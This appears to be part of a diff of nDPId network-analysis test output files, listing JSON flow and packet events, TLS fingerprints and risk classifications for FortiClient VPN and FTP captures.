00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1621067205651,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067205651,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFzKMsSeiBCAAAAALAC\/\/87PQAAAgQFtAEDAwUBAQgKJ6dEZQAAAAAEAgAA"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1621067205710,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067205710,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8c5FAADQGkHJSUS4NwKgBsijL8XP7CfxqEnogQ6ASOECEzAAAAgQFrAQCCAoGP5FzJ6dEZQEDAwo="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1621067205710,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067205710,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFzKMsSeiBD+wn8a4AQECzbbQAAAQEICienRJ8GP5Fz"}
01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067205651,"flow_last_seen":1621067205856,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067205856,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01150{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067205651,"flow_last_seen":1621067205926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067205926,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
01416{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067205651,"flow_last_seen":1621067205928,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067205928,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067206773,"flow_last_seen":1621067206773,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067206773,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1621067206773,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067206773,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfF0KMspKYnJAAAAALAC\/\/+2swAAAgQFtAEDAwUBAQgKJ6dItwAAAAAEAgAA"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1621067206833,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067206833,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA85JFAADQGH3JSUS4NwKgBsijL8XTNezJoKSmJyqASOED3YgAAAgQFrAQCCAoGP5HkJ6dItwEDAwo="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1621067206833,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067206833,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfF0KMspKYnKzXsyaYAQECxOAgAAAQEICienSPMGP5Hk"}
01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067206773,"flow_last_seen":1621067206977,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067206977,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01150{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":76,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067206773,"flow_last_seen":1621067207049,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067207049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
01416{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067206773,"flow_last_seen":1621067207050,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067207050,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067209199,"flow_last_seen":1621067209199,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067209199,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1621067209199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067209199,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfF8KMsekCMzAAAAALAC\/\/8eiQAAAgQFtAEDAwUBAQgKJ6dSCQAAAAAEAgAA"}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1621067209262,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067209262,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA81pJAADQGLXFSUS4NwKgBsijL8XxcuXqIHpAjNKASOECG6AAAAgQFrAQCCAoGP5LWJ6dSCQEDAwo="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1621067209262,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067209262,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfF8KMsekCM0XLl6iYAQECzdhQAAAQEICienUkcGP5LW"}
01151{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067209199,"flow_last_seen":1621067209264,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1621067209264,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
01208{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067209199,"flow_last_seen":1621067209346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1753,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1621067209346,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"e35df3e00ca4ef31d42b34bebaa2f86e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
01474{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067209199,"flow_last_seen":1621067209348,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2734,"flow_avg_l4_payload_len":390,"midstream":0,"thread_ts_msec":1621067209348,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"e35df3e00ca4ef31d42b34bebaa2f86e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}}
00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1621067203571,"flow_last_seen":1621067204682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3422,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}}
00959{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1621067204622,"flow_last_seen":1621067205708,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6751,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}}
00959{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1621067205651,"flow_last_seen":1621067206738,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3853,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}}
00959{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1621067206773,"flow_last_seen":1621067207860,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7276,"flow_avg_l4_payload_len":250,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}}
00964{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1901,"flow_first_seen":1621067209199,"flow_last_seen":1621067222261,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":277457,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}}
00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","packets-captured":2000,"packets-processed":2000,"total-skipped-flows":0,"total-l4-data-len":298759,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":10,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":43,"global_ts_msec":1621067222261}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 2000/2000

12
test/results/ftp-start-tls.pcap.out
View File

@@ -1,11 +1,11 @@
00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ftp-start-tls.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ftp-start-tls.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1383123629078}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383123629078,"flow_last_seen":1383123629078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383123629078,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1383123629078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFOAAs3ocAAP8GetIK7hokCtwyTPKMABUzQlCKAAAAAGACIACjMgAAAgQCAAAA"}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1383123629078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFAAAs+dJAAD8G378K3DJMCu4aJAAV8owdfc81M0JQi2ASwAASugAAAgQFtAAA"}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1383123629078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFAAAs+dJAAD0G4b8K3DJMCu4aJAAV8owdfc81M0JQi2ASwAASugAAAgQFtAAA"}
00816{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1383123629078,"flow_last_seen":1383123629098,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1383123629098,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":51,"flow_first_seen":1383123629078,"flow_last_seen":1383123629412,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":4690,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1383123629412,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}}
